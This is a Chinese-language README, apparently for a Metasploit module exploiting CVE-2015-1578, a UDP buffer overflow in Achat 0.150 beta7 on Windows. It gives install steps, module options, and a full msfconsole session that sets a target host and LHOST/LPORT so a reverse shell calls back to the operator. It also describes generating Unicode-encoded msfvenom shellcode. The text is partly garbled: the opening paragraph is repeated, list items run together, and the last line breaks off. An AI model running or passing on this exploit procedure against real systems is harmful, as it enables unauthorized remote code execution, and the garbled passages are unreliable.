这是一个针对CVE-2015-1578的概念验证型Metasploit模块漏洞利用,该漏洞是Windows上Achat 0.150 beta7中的一个缓冲区溢出漏洞。通过精心构造的UDP数据包,漏洞利用可实现远程代码执行。
这是针对 CVE-2015-1578 的一个 Metasploit 模块,该漏洞是 Windows 上 Achat 0.150 beta7 中的一个缓冲区溢出漏洞。利用该漏洞可通过特制的 UDP 数据包实现远程代码执行。
本模块旨在作为 Metasploit 漏洞利用开发的一个简洁、最小且结构良好的示例。它演示了:
msfvenom 动态生成 Unicode 编码的 shellcode$PATH 中存在 msfvenommsfvenom 生成带有 x86/unicode_mixed 编码和自定义坏字符的 payload./install.sh
然后启动 Metasploit 并运行:
reload_all
use exploit/windows/yaldobaoth/achat_bof
选项
RHOSTS – 目标 IP 地址(必填)LHOST – 用于反向 Shell 的本地主机 IP(必填)LPORT – 反向 Shell 的本地端口(默认:4444)RPORT – 目标的远程 UDP 端口(默认:9256)使用示例
msfconsole
use exploit/windows/yaldobaoth/achat_bof
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
这将:
LHOST:LPORT 上监听 Shell